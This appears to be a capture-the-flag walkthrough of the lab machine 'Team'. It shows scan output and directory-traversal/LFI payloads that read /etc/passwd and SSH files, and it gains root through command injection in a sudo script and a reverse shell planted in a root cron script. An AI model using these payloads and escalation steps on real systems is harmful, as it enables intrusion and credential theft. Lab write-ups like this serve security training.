Team

Enumeration

Port Scan

Run a Port Scan using NMAP nmap -sV -sC -oA nmap/output <IP_ADDRESS_OF_MASCHINE>
We can see that Ports 21, 22 and 80 are open

Nmap 7.80 scan initiated Fri Mar  5 21:49:20 2021 as: nmap -sV -sC -oA nmap/output teamcw
Nmap scan report for teamcw (10.10.87.236)
Host is up (0.055s latency).
Not shown: 997 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 79:5f:11:6a:85:c2:08:24:30:6c:d4:88:74:1b:79:4d (RSA)
|   256 af:7e:3f:7e:b4:86:58:83:f1:f6:a2:54:a6:9b:ba:ad (ECDSA)
|_  256 26:25:b0:7b:dc:3f:b2:94:37:12:5d:cd:06:98:c7:9f (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works! If you see this add 'te...
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done at Fri Mar  5 21:49:38 2021 -- 1 IP address (1 host up) scanned in 17.39 seconds

Next I had a quick look at the web page
Only the Apache2 Ubuntu Default Page was shown
Having a look at the Source showed that I have to add ‘team.thm’ to my hosts file

After putting team.thm into my hosts file the following page appeared

Next I ran gobuster and found the hidden directory scripts gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://team.thm

Wthin this directory there is a file called script.txt gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://team.thm/scripts/ -x .txt

Browsing to http://team.thm/scripts/script.txt displays the following:

the hint on the very bottom made me try to access: http://team.thm/scripts/script.old

Voilà :)

We now have FTP Credentials and can use them to login to the FTP service

Next I checked out the New_site.txt:

It seems like we have to adjust the entry in our hosts file from team.thm to dev.team.thm Furthermore, the two names within the .txt file look like usernames. Let’s take a note of that.

Browsing to dev.team.thm shows us the following

The page=teamshare.php looks very suspicious.

Lets try: page=../../../../etc/passwd

Nice :)

Being able to exploit this Directory Traversal / LFI Vulnerabilty we can now try to find the id_rsa that was mentioned in the New_site.txt
- view-source:http://dev.team.thm/script.php?page=php://filter/resource=../../../../etc/ssh/sshd_config

We can now connect to the machine with the following command: ssh -i id_rsa [email protected] and get the user.txt

Steps to root.txt

Enumeration

What I almost always do first is sudo -l

That looks interesting. Let’s have a closer look at /home/gyles/admin_checks

The lines outlined in red look interesting. It seems as if the provided user input will be executed without any further sanitization.

So, I started the script with the following line: sudo -u gyles /home/gyles/admin_checks

and then provided /bin/bash as the date argument

We are now in the context of gyles.

Gyles is a member of the admin group. Let’s take a note of that.

I continued my search for possible privilege escalation vectors using linpeas.sh (https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS).

The screenshot below shows something interesting:

Inside the /opt/admin_stuff/ directory I found script.sh

Interesting. So /usr/local/bin/main_backup.sh is executed every minute.

Let’s find out what it does:

It basically just copies the content of one directory into another.

Checking out the destination directory showed me that the task is being performed as root.

And the good thing about it is, being a member of the admin group gives us write access to /usr/local/bin/main_backup.sh

So all that’s left to do is

starting a netcat listener
putting a reverse shell into main_backup.sh
wait maximum 1 minute

and of course get root.txt :)